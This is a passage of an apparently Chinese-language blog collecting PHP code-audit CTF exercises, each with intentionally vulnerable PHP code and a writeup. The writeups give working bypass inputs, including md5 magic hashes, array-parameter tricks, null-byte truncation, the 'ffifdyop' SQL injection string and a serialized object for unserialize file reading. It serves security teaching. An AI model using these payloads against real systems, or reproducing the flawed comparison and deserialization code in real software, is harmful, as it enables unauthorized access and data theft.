class="keyword">print</span> <span class="string">'Invalid password'</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>若为<code>md5($_GET[&#39;username&#39;]) == md5($_GET[&#39;password&#39;])</code><br>则可以构造：<br><code>http://localhost/php_bugs/18.php?username=QNKCDZO&amp;password=240610708</code><br>因为<code>==</code>对比的时候会进行数据转换，<code>0eXXXXXXXXXX</code> 转成<code>0</code>了<br>也可以使用数组绕过<br><code>http://localhost/php_bugs/18.php?username[]=1&amp;password[]=2</code></p><p>但此处是<code>===</code>，只能用数组绕过，<code>PHP</code>对数组进行<code>hash</code>计算都会得出<code>null</code>的空值<br><code>http://localhost/php_bugs/18.php?username[]=1&amp;password[]=2</code></p><h2 id="19-ereg-函数strpos-函数用数组返回NULL绕过"><a href="#19-ereg-函数strpos-函数用数组返回NULL绕过" class="headerlink" title="19 ereg()函数strpos() 函数用数组返回NULL绕过"></a>19 ereg()函数strpos() 函数用数组返回NULL绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span>  </div><div class="line"></div><div class="line">$flag = <span class="string">"flag"</span>;  </div><div class="line">   </div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> ($_GET[<span class="string">'password'</span>])) &#123;  </div><div class="line">    <span class="keyword">if</span> (ereg (<span class="string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="string">'password'</span>]) === <span class="keyword">FALSE</span>)  </div><div class="line">        <span class="keyword">echo</span> <span class="string">'You password must be alphanumeric'</span>;  </div><div class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (strpos ($_GET[<span class="string">'password'</span>], <span class="string">'--'</span>) !== <span class="keyword">FALSE</span>)  </div><div class="line">        <span class="keyword">die</span>(<span class="string">'Flag: '</span> . $flag);  </div><div class="line">    <span class="keyword">else</span>  </div><div class="line">        <span class="keyword">echo</span> <span class="string">'Invalid password'</span>;  </div><div class="line">&#125;  </div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><ul><li><p>方法一：<br>ereg()正则函数可以用<code>%00</code>截断<br><code>http://localhost/php_bugs/19.php?password=1%00--</code></p></li><li><p>方法二：<br>将<code>password</code>构造一个<code>arr[]</code>，传入之后，<code>ereg</code>是返回<code>NULL</code>的，<code>===</code>判断<code>NULL</code>和 <code>FALSE</code>，是不相等的，所以可以进入第二个判断，而<code>strpos</code>处理数组，也是返回<code>NULL</code>，注意这里的是<code>!==</code>，<code>NULL!==FALSE</code>,条件成立，拿到<code>flag</code><br><code>http://localhost/php_bugs/19.php?password[]=</code></p></li></ul><h2 id="20-十六进制与数字比较"><a href="#20-十六进制与数字比较" class="headerlink" title="20 十六进制与数字比较"></a>20 十六进制与数字比较</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">noother_says_correct</span><span class="params">($temp)</span></span></div><div class="line"><span class="function"></span>&#123;</div><div class="line">    $flag = <span class="string">'flag&#123;test&#125;'</span>;</div><div class="line">    $one = ord(<span class="string">'1'</span>);  <span class="comment">//ord — 返回字符的 ASCII 码值</span></div><div class="line">    $nine = ord(<span class="string">'9'</span>); <span class="comment">//ord — 返回字符的 ASCII 码值</span></div><div class="line">    $number = <span class="string">'3735929054'</span>;</div><div class="line">    <span class="comment">// Check all the input characters!</span></div><div class="line">    <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; strlen($number); $i++)</div><div class="line">    &#123; </div><div class="line">        <span class="comment">// Disallow all the digits!</span></div><div class="line">        $digit = ord($temp&#123;$i&#125;);</div><div class="line">        <span class="keyword">if</span> ( ($digit &gt;= $one) &amp;&amp; ($digit &lt;= $nine) )</div><div class="line">        &#123;</div><div class="line">            <span class="comment">// Aha, digit not allowed!</span></div><div class="line">            <span class="keyword">return</span> <span class="string">"flase"</span>;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">if</span>($number == $temp)</div><div class="line">        <span class="keyword">return</span> $flag;</div><div class="line">&#125;</div><div class="line">$temp = $_GET[<span class="string">'password'</span>];</div><div class="line"><span class="keyword">echo</span> noother_says_correct($temp);</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p>这里，它不让输入1到9的数字，但是后面却让比较一串数字，平常的方法肯定就不能行了，大家都知道计算机中的进制转换，当然也是可以拿来比较的，<code>0x</code>开头则表示<code>16</code>进制，将这串数字转换成<code>16</code>进制之后发现，是d<code>eadc0de</code>，在开头加上<code>0x</code>，代表这个是<code>16</code>进制的数字，然后再和十进制的 <code>3735929054</code>比较，答案当然是相同的，返回<code>true</code>拿到<code>flag</code></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">echo  dechex ( 3735929054 ); // 将3735929054转为16进制</div><div class="line">结果为：deadc0de</div></pre></td></tr></table></figure><p>构造：<br><code>http://localhost/php_bugs/20.php?password=0xdeadc0de</code></p><h2 id="21-数字验证正则绕过"><a href="#21-数字验证正则绕过" class="headerlink" title="21 数字验证正则绕过"></a>21 数字验证正则绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">$flag = <span class="string">'flag&#123;test&#125;'</span>;</div><div class="line"><span class="keyword">if</span>  (<span class="string">"POST"</span> == $_SERVER[<span class="string">'REQUEST_METHOD'</span>]) </div><div class="line">&#123; </div><div class="line">    $password = $_POST[<span class="string">'password'</span>]; </div><div class="line">    <span class="keyword">if</span> (<span class="number">0</span> &gt;= preg_match(<span class="string">'/^[[:graph:]]&#123;12,&#125;$/'</span>, $password)) <span class="comment">//preg_match — 执行一个正则表达式匹配</span></div><div class="line">    &#123; </div><div class="line">        <span class="keyword">echo</span> <span class="string">'Wrong Format'</span>; </div><div class="line">        <span class="keyword">exit</span>; </div><div class="line">    &#125; </div><div class="line">    <span class="keyword">while</span> (<span class="keyword">TRUE</span>) </div><div class="line">    &#123; </div><div class="line">        $reg = <span class="string">'/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'</span>; </div><div class="line">        <span class="keyword">if</span> (<span class="number">6</span> &gt; preg_match_all($reg, $password, $arr)) </div><div class="line">            <span class="keyword">break</span>; </div><div class="line">        $c = <span class="number">0</span>; </div><div class="line">        $ps = <span class="keyword">array</span>(<span class="string">'punct'</span>, <span class="string">'digit'</span>, <span class="string">'upper'</span>, <span class="string">'lower'</span>); <span class="comment">//[[:punct:]] 任何标点符号 [[:digit:]] 任何数字  [[:upper:]] 任何大写字母  [[:lower:]] 任何小写字母 </span></div><div class="line">        <span class="keyword">foreach</span> ($ps <span class="keyword">as</span> $pt) </div><div class="line">        &#123; </div><div class="line">            <span class="keyword">if</span> (preg_match(<span class="string">"/[[:$pt:]]+/"</span>, $password)) </div><div class="line">                $c += <span class="number">1</span>; </div><div class="line">        &#125; </div><div class="line">        <span class="keyword">if</span> ($c &lt; <span class="number">3</span>) <span class="keyword">break</span>; </div><div class="line">        <span class="comment">//&gt;=3，必须包含四种类型三种与三种以上</span></div><div class="line">        <span class="keyword">if</span> (<span class="string">"42"</span> == $password) <span class="keyword">echo</span> $flag; </div><div class="line">        <span class="keyword">else</span> <span class="keyword">echo</span> <span class="string">'Wrong password'</span>; </div><div class="line">        <span class="keyword">exit</span>; </div><div class="line">    &#125; </div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p><code>0 &gt;= preg_match(&#39;/^[[:graph:]]{12,}$/&#39;, $password)</code><br>意为必须是12个字符以上（非空格非TAB之外的内容）</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">$reg = &apos;/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/&apos;; </div><div class="line">if (6 &gt; preg_match_all($reg, $password, $arr))</div></pre></td></tr></table></figure><p>意为匹配到的次数要大于6次</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">$ps = array(&apos;punct&apos;, &apos;digit&apos;, &apos;upper&apos;, &apos;lower&apos;); //[[:punct:]] 任何标点符号 [[:digit:]] 任何数字  [[:upper:]] 任何大写字母  [[:lower:]] 任何小写字母 </div><div class="line">foreach ($ps as $pt) </div><div class="line">&#123; </div><div class="line">    if (preg_match(&quot;/[[:$pt:]]+/&quot;, $password)) </div><div class="line">        $c += 1; </div><div class="line">&#125; </div><div class="line">if ($c &lt; 3) break;</div></pre></td></tr></table></figure><p>意为必须要有大小写字母，数字，字符内容三种与三种以上</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">if (&quot;42&quot; == $password) echo $flag;</div></pre></td></tr></table></figure><p>意为必须等于<code>42</code></p><p>答案：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">42.00e+00000000000 </div><div class="line">或</div><div class="line">420.000000000e-1</div></pre></td></tr></table></figure><p></p><p>资料：</p><ul><li><p><a href="http://bobao.360.cn/learning/detail/248.html" target="_blank" rel="external">安全宝「约宝妹」代码审计CTF题解</a></p></li><li><p><a href="https://3v4l.org/jYSpC" target="_blank" rel="external">各种版本PHP在线迷你运行脚本</a></p></li><li><p><a href="http://php.net/manual/en/language.operators.comparison.php" target="_blank" rel="external">PHP Comparison Operators</a></p></li></ul><h2 id="22-弱类型整数大小比较绕过"><a href="#22-弱类型整数大小比较绕过" class="headerlink" title="22 弱类型整数大小比较绕过"></a>22 弱类型整数大小比较绕过</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">$flag = <span class="string">"flag&#123;test&#125;"</span>;</div><div class="line"></div><div class="line">$temp = $_GET[<span class="string">'password'</span>];</div><div class="line">is_numeric($temp)?<span class="keyword">die</span>(<span class="string">"no numeric"</span>):<span class="keyword">NULL</span>;    </div><div class="line"><span class="keyword">if</span>($temp&gt;<span class="number">1336</span>)&#123;</div><div class="line">    <span class="keyword">echo</span> $flag;</div><div class="line">&#125; </div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p><code>is_numeric($temp)?die(&quot;no numeric&quot;):NULL;</code><br>不能是数字</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">if($temp&gt;1336)&#123;</div><div class="line">    echo $flag;</div><div class="line">&#125;</div></pre></td></tr></table></figure><p>又要大于<code>1336</code></p><p>利用<code>PHP</code>弱类型的一个特性，当一个整形和一个其他类型行比较的时候，会先把其他类型<code>intval</code>再比。如果输入一个<code>1337a</code>这样的字符串，在<code>is_numeric</code>中返回<code>true</code>，然后在比较时被转换成数字<code>1337</code>，这样就绕过判断输出<code>flag</code>。</p><p><code>http://localhost/php_bugs/22.php?password=1337a</code></p><h2 id="23-md5函数验证绕过"><a href="#23-md5函数验证绕过" class="headerlink" title="23 md5函数验证绕过"></a>23 md5函数验证绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">$flag = <span class="string">'flag&#123;test&#125;'</span>;</div><div class="line">$temp = $_GET[<span class="string">'password'</span>];</div><div class="line"><span class="keyword">if</span>(md5($temp)==<span class="number">0</span>)&#123;</div><div class="line">    <span class="keyword">echo</span> $flag;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><code>if(md5($temp)==0)</code><br>要使<code>md5</code>函数加密值为<code>0</code></p><p><strong>writeup</strong></p><ul><li><p>方法一：<br>使<code>password</code>不赋值，为<code>NULL</code>，<code>NULL == 0</code>为<code>true</code><br><code>http://localhost/php_bugs/23.php?password=</code><br><code>http://localhost/php_bugs/23.php</code></p></li><li><p>方法二：<br>经过MD5运算后，为<code>0e******</code>的形式，其结果为<code>0*10</code>的<code>n</code>次方，结果还是零<br><code>http://localhost/php_bugs/23.php?password=240610708</code><br><code>http://localhost/php_bugs/23.php?password=QNKCDZO</code></p></li></ul><h2 id="24-md5函数true绕过注入"><a href="#24-md5函数true绕过注入" class="headerlink" title="24 md5函数true绕过注入"></a>24 md5函数true绕过注入</h2><p><strong>code</strong><br></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span> </div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line">$link = mysql_connect(<span class="string">'localhost'</span>, <span class="string">'root'</span>, <span class="string">'root'</span>);</div><div class="line"><span class="keyword">if</span> (!$link) &#123; </div><div class="line">  <span class="keyword">die</span>(<span class="string">'Could not connect to MySQL: '</span> . mysql_error()); </div><div class="line">&#125; </div><div class="line"><span class="comment">// 选择数据库</span></div><div class="line">$db = mysql_select_db(<span class="string">"security"</span>, $link);</div><div class="line"><span class="keyword">if</span>(!$db)</div><div class="line">&#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'select db error'</span>;</div><div class="line">  <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line"><span class="comment">// 执行sql</span></div><div class="line">$password = $_GET[<span class="string">'password'</span>];</div><div class="line">$sql = <span class="string">"SELECT * FROM users WHERE password = '"</span>.md5($password,<span class="keyword">true</span>).<span class="string">"'"</span>;</div><div class="line">var_dump($sql);</div><div class="line"><span class="comment">// SELECT * FROM users WHERE password = '276f722736c95d99e921722cf9ed621c'</span></div><div class="line">$result=mysql_query($sql) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">'&lt;pre&gt;'</span> . mysql_error() . <span class="string">'&lt;/pre&gt;'</span> );</div><div class="line">$row1 = mysql_fetch_row($result);</div><div class="line">var_dump($row1);</div><div class="line">mysql_close($link);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p></p><p><strong>writeup</strong></p><p><code>$sql = &quot;SELECT * FROM users WHERE password = &#39;&quot;.md5($password,true).&quot;&#39;&quot;;</code><br><code>md5($password,true)</code><br>将<code>md5</code>后的<code>hex</code>转换成字符串</p><p>如果包含<code>&#39;or&#39;xxx</code>这样的字符串，那整个<code>sql</code>变成</p><p><code>SELECT * FROM admin WHERE pass = &#39;&#39;or&#39;xxx&#39;</code>就绕过了</p><p>字符串：<code>ffifdyop</code></p><p><code>md5</code>后，<code>276f722736c95d99e921722cf9ed621c</code><br><code>hex</code>转换成字符串：<code>&#39;or&#39;6&lt;trash&gt;</code></p><p>构造：<code>?password=ffifdyop</code></p><p>资料：</p><ul><li><p><a href="http://www.w3school.com.cn/php/func_string_md5.asp" target="_blank" rel="external">PHP md5() 函数</a></p></li><li><p><a href="http://blog.csdn.net/greyfreedom/article/details/45846137" target="_blank" rel="external">MD5加密后的SQL 注入</a></p></li><li><p><a href="http://www.am0s.com/functions/204.html" target="_blank" rel="external">敏感函数md5()</a></p></li><li><p><a href="http://www.xmanblog.net/2017/04/04/php-magic/" target="_blank" rel="external">php黑魔法</a></p></li></ul><h2 id="25-switch没有break-字符与0比较绕过"><a href="#25-switch没有break-字符与0比较绕过" class="headerlink" title="25 switch没有break 字符与0比较绕过"></a>25 switch没有break 字符与0比较绕过</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"><span class="comment">// error_reporting(0);</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'which'</span>]))</div><div class="line">&#123;</div><div class="line">    $which = $_GET[<span class="string">'which'</span>];</div><div class="line">    <span class="keyword">switch</span> ($which)</div><div class="line">    &#123;</div><div class="line">    <span class="keyword">case</span> <span class="number">0</span>:</div><div class="line">    <span class="keyword">print</span>(<span class="string">'arg'</span>);</div><div class="line">    <span class="comment">// break;</span></div><div class="line">    <span class="keyword">case</span> <span class="number">1</span>:</div><div class="line">    <span class="keyword">case</span> <span class="number">2</span>:</div><div class="line">        <span class="keyword">require_once</span> $which.<span class="string">'.php'</span>;</div><div class="line">         <span class="keyword">echo</span> $flag;</div><div class="line">        <span class="keyword">break</span>;</div><div class="line">    <span class="keyword">default</span>:</div><div class="line">        <span class="keyword">echo</span> GWF_HTML::error(<span class="string">'PHP-0817'</span>, <span class="string">'Hacker NoNoNo!'</span>, <span class="keyword">false</span>);</div><div class="line">        <span class="keyword">break</span>;</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>让我们包含当前目录中的<code>flag.php</code>，给<code>which</code>为<code>flag</code>，这里会发现在<code>case 0</code>和<code>case 1</code>的时候，没有<code>break</code>，按照常规思维，应该是<code>0</code>比较不成功，进入比较<code>1</code>，然后比较<code>2</code>，再然后进入<code>default</code>，但是事实却不是这样，事实上，在 <code>case 0</code>的时候，字符串和<code>0</code>比较是相等的，进入了<code>case 0</code>的方法体，但是却没有<code>break</code>，这个时候，默认判断已经比较成功了，而如果匹配成功之后，会继续执行后面的语句，这个时候，是不会再继续进行任何判断的。也就是说，我们<code>which</code>传入<code>flag</code>的时候，<code>case 0</code>比较进入了方法体，但是没有<code>break</code>，默认已经匹配成功，往下执行不再判断，进入<code>2</code>的时候，执行了<code>require_once flag.php</code></p><p>PHP中非数字开头字符串和数字 <code>0</code>比较<code>==</code>都返回<code>True</code></p><p>因为通过逻辑运算符让字符串和数字比较时，会自动将字符串转换为数字.而当字符串无法转换为数字时，其结果就为<code>0</code>了，然后再和另一个<code>0</code>比大小，结果自然为<code>ture</code>。注意：如果那个字符串是以数字开头的，如<code>6ldb</code>，它还是可以转为数字<code>6</code>的，然后和<code>0</code>比较就不等了（但是和<code>6</code>比较就相等）<br><code>if($str==0)</code> 判断 和 <code>if( intval($str) == 0 )</code> 是等价的</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">可以验证：</div><div class="line">&lt;?php</div><div class="line">$str=&quot;s6s&quot;;</div><div class="line">if($str==0)&#123; echo &quot;返回了true.&quot;;&#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure><p>要字符串与数字判断不转类型方法有：</p><ul><li><p>方法一：<br><code>$str=&quot;字符串&quot;;if($str===0){ echo &quot;返回了true.&quot;;}</code></p></li><li><p>方法二：<br><code>$str=&quot;字符串&quot;;if($str==&quot;0&quot;){ echo &quot;返回了true.&quot;;} ,</code></p></li></ul><p>此题构造：<code>http://localhost/php_bugs/25.php?which=flag</code></p><p>资料：</p><ul><li><a href="https://zhidao.baidu.com/question/336186893.html" target="_blank" rel="external">PHP中字符串和数字 0 比较为什么返回true？</a></li></ul><h2 id="26-unserialize-序列化"><a href="#26-unserialize-序列化" class="headerlink" title="26 unserialize()序列化"></a>26 unserialize()序列化</h2><p><strong>code</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div></pre></td><td class="code"><pre><div class="line">&lt;!-- 题目：http:<span class="comment">//web.jarvisoj.com:32768 --&gt;</span></div><div class="line"></div><div class="line">&lt;!-- index.php --&gt;</div><div class="line"><span class="meta">&lt;?php</span> </div><div class="line">    <span class="keyword">require_once</span>(<span class="string">'shield.php'</span>);</div><div class="line">    $x = <span class="keyword">new</span> Shield();</div><div class="line">    <span class="keyword">isset</span>($_GET[<span class="string">'class'</span>]) &amp;&amp; $g = $_GET[<span class="string">'class'</span>];</div><div class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($g)) &#123;</div><div class="line">        $x = unserialize($g);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">echo</span> $x-&gt;readfile();</div><div class="line"><span class="meta">?&gt;</span></div><div class="line">&lt;img src=<span class="string">"showimg.php?img=c2hpZWxkLmpwZw=="</span> width=<span class="string">"100%"</span>/&gt;</div><div class="line"></div><div class="line">&lt;!-- shield.php --&gt;</div><div class="line"></div><div class="line"><span class="meta">&lt;?php</span></div><div class="line">    <span class="comment">//flag is in pctf.php</span></div><div class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Shield</span> </span>&#123;</div><div class="line">        <span class="keyword">public</span> $file;</div><div class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($filename = <span class="string">''</span>)</span> </span>&#123;</div><div class="line">            <span class="keyword">$this</span> -&gt; file = $filename;</div><div class="line">        &#125;</div><div class="line">        </div><div class="line">        <span class="function"><span class="keyword">function</span> <span class="title">readfile</span><span class="params">()</span> </span>&#123;</div><div class="line">            <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;file) &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'..'</span>)===<span class="keyword">FALSE</span>  </div><div class="line">            &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'/'</span>)===<span class="keyword">FALSE</span> &amp;&amp; stripos(<span class="keyword">$this</span>-&gt;file,<span class="string">'\\'</span>)==<span class="keyword">FALSE</span>) &#123;</div><div class="line">                <span class="keyword">return</span> @file_get_contents(<span class="keyword">$this</span>-&gt;file);</div><div class="line">            &#125;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"><span class="meta">?&gt;</span></div><div class="line"></div><div class="line">&lt;!-- showimg.php --&gt;</div><div class="line"><span class="meta">&lt;?php</span></div><div class="line">    $f = $_GET[<span class="string">'img'</span>];</div><div class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($f)) &#123;</div><div class="line">        $f = base64_decode($f);</div><div class="line">        <span class="keyword">if</span> (stripos($f,<span class="string">'..'</span>)===<span class="keyword">FALSE</span> &amp;&amp; stripos($f,<span class="string">'/'</span>)===<span class="keyword">FALSE</span> &amp;&amp; stripos($f,<span class="string">'\\'</span>)===<span class="keyword">FALSE</span></div><div class="line">        <span class="comment">//stripos — 查找字符串首次出现的位置（不区分大小写）</span></div><div class="line">        &amp;&amp; stripos($f,<span class="string">'pctf'</span>)===<span class="keyword">FALSE</span>) &#123;</div><div class="line">            readfile($f);</div><div class="line">        &#125; <span class="keyword">else</span> &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"File not found!"</span>;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure><p><strong>writeup</strong></p><p>说明<code>flag</code>在<code>pctf.php</code>，但<code>showimg.php</code>中不允许直接读取<code>pctf.php</code>，只有在<code>index.php</code>中可以传入变量<code>class</code><br>，<code>index.php</code>中<code>Shield</code>类的实例<code>$X = unserialize($g)</code>，<code>$g = $_GET[&#39;class&#39;];</code>，<code>$X</code>中不知<code>$filename</code>变量，但需要找的是：<code>$filename = &quot;pctf.php&quot;</code>，现<code>$X</code>已知，求传入的<code>class</code>变量值。<br>可以进行序列化操作：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">&lt;!-- answer.php --&gt;</div><div class="line">&lt;?php</div><div class="line"></div><div class="line">require_once(&apos;shield.php&apos;);</div><div class="line">$x = class Shield();</div><div class="line">$g = serialize($x);</div><div class="line">echo $g;</div><div class="line"></div><div class="line">?&gt;</div><div class="line"></div><div class="line">&lt;!-- shield.php --&gt;</div><div class="line">&lt;?php</div><div class="line">    //flag is in pctf.php</div><div class="line">    class Shield &#123;</div><div class="line">        public $file;</div><div class="line">        function __construct($filename = &apos;pctf.php&apos;) &#123;</div><div class="line">            $this -&gt; file = $filename;</div><div class="line">        &#125;</div><div class="line">        </div><div class="line">        function readfile() &#123;</div><div class="line">            if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&apos;..&apos;)===FALSE  </div><div class="line">            &amp;&amp; stripos($this-&gt;file,&apos;/&apos;)===FALSE &amp;&amp; stripos($this-&gt;file,&apos;\\&apos;)==FALSE) &#123;</div><div class="line">                return @file_get_contents($this-&gt;file);</div><div class="line">            &#125;</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure><p></p><p>得到：<br><code>O:6:&quot;Shield&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;}</code><br>构造：<br><code>http://web.jarvisoj.com:32768/index.php?class=O:6:&quot;Shield&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;}</code></p>]]></content>
    
    <summary type="html">
    
      
      
